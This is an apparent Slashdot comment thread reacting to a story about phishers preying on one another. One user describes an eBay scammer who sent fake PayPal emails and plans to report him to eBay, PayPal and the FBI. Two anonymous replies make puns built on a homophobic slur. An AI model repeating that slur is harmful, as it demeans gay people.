Just like a bunch of nasty, hungry rats caught in a trap together, they all start turning on each other. Bloody funny!

So how do you call the phished phishermen? (0)

Anonymous Coward | more than 6 years ago | (#22165348)

Mr. Brain's Faggots?

Re:So how do you call the phished phishermen? (0)

Anonymous Coward | more than 6 years ago | (#22165588)

That would be Phaggots.

[no subject] (0)

Anonymous Coward | more than 6 years ago | (#22166356)

There's always a bigger phish.

Reporting a Phisher (1)

emil10001 (985596) | more than 6 years ago | (#22166564)

I know this is a bit off topic, but it is related. I'm in the middle of trying to get rid of a phisher/scammer who won an eBay auction of mine. They took over someone else's account (eBay knows about this), bid on my item and won. Then they requested that I send the laptop to Nigeria (in the auction I explicitly stated that I would only send it to the US, Canada, and the UK). I knew that this person was a scammer, it was fairly obvious from the wrong e-mail addresses and Engrish, so I told him/her to stop bothering me. I then get a bunch of fake e-mails to me claiming to be from PayPal and eBay, saying that once I send the laptop, PayPal will release the funds. This person is deliberately preventing me from getting a refund for the auction costs from eBay, and obviously, preventing me from selling this laptop (or at least delaying it). Needless to say, I'm getting pretty annoyed with this guy.

I was able to grab what I believe to be his IP address off of the headers from a couple of e-mails that he sent to me, and found his ISP, but that's about as far as I got. I think that it is actually his IP address, but I'm not sure. My current plan is to send all communications between he and I to eBay, PayPal and the FBI, and be done with it. Any suggestions?

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>